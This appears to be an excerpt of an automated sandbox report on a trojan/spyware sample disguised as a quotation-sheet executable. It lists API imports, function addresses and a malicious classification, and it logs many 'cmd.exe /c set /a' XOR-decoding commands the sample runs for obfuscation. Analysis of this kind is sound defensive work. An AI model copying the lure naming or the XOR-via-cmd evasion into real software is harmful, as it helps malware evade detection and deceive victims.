            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: Conhost.exe | Process created: 96

            System Summary

            barindex
            Source: initial sample | Static PE information: Filename: z1QuotationSheetVSAA6656776.exe
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_004049F9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_004064AE
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_004049F9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_004064AE
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016F01B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016B0A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00166118
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016C198
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016C47B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016C75F
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00166880
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016990B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016CA38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00164AD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016BBD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016CD18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016BEBB
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016E530
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016E52B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00163578
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37847D90
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378411C0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784B518
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37843870
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378473E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784F700
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784FB49
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784FB58
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784D75A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784D768
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784F29A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784F2A8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784F6F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784EE40
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784EE50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E591
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E5A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378411B7
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E9E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E9F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37840900
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E138
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784E148
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37840D57
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37840D60
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37840490
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378404A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378484B3
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378484B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_378408F1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784003B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37840040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37843863
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B92BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9E990
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9EFD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9C3C0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B93D10
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9BD70
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9B168
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9E340
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9D6A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9DCF0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9CA08
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9D050
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B99BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9C3B0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B92BAA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B911A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B99BA0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B96F90
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9E983
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B99FF9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B915F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9C9F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B92FFA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B915E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B985D0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37B9EFC9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B985C1131_2_37B985C1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90D38131_2_37B90D38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99730131_2_37B99730
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99720131_2_37B99720
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95F18131_2_37B95F18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9AD10131_2_37B9AD10
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95F15131_2_37B95F15
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9AD00131_2_37B9AD00
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92300131_2_37B92300
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98178131_2_37B98178
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98169131_2_37B98169
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9536A131_2_37B9536A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9BD60131_2_37B9BD60
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92758131_2_37B92758
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9B15A131_2_37B9B15A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90D48131_2_37B90D48
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92748131_2_37B92748
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B938B8131_2_37B938B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A8B8131_2_37B9A8B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91EA8131_2_37B91EA8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B938A8131_2_37B938A8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A8AA131_2_37B9A8AA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91E99131_2_37B91E99
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90498131_2_37B90498
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B96290131_2_37B96290
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D690131_2_37B9D690
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90488131_2_37B90488
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98E80131_2_37B98E80
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B97CF8131_2_37B97CF8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B908F0131_2_37B908F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B922F0131_2_37B922F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B97CE8131_2_37B97CE8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9DCE0131_2_37B9DCE0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B908E2131_2_37B908E2
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B992D8131_2_37B992D8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B992CA131_2_37B992CA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98A28131_2_37B98A28
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98A18131_2_37B98A18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95410131_2_37B95410
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A008131_2_37B9A008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93008131_2_37B93008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90006131_2_37B90006
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98E70131_2_37B98E70
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A460131_2_37B9A460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93460131_2_37B93460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91A50131_2_37B91A50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93450131_2_37B93450
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A450131_2_37B9A450
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91A40131_2_37B91A40
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90040131_2_37B90040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D040131_2_37B9D040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DD5C98131_2_37DD5C98
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEF378131_2_37DEF378
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEC57C131_2_37DEC57C
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: String function: 00402A3A appears 52 times
Source: z1QuotationSheetVSAA6656776.exe Static PE information: invalid certificate
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927175807.0000000034B27000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z1QuotationSheetVSAA6656776.exe
Source: z1QuotationSheetVSAA6656776.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@408/13@4/4
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Mutant created: NULL
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File created: C:\Users\user\AppData\Local\Temp\nsa9B22.tmp
Source: z1QuotationSheetVSAA6656776.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: z1QuotationSheetVSAA6656776.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File read: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
Source: unknown Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
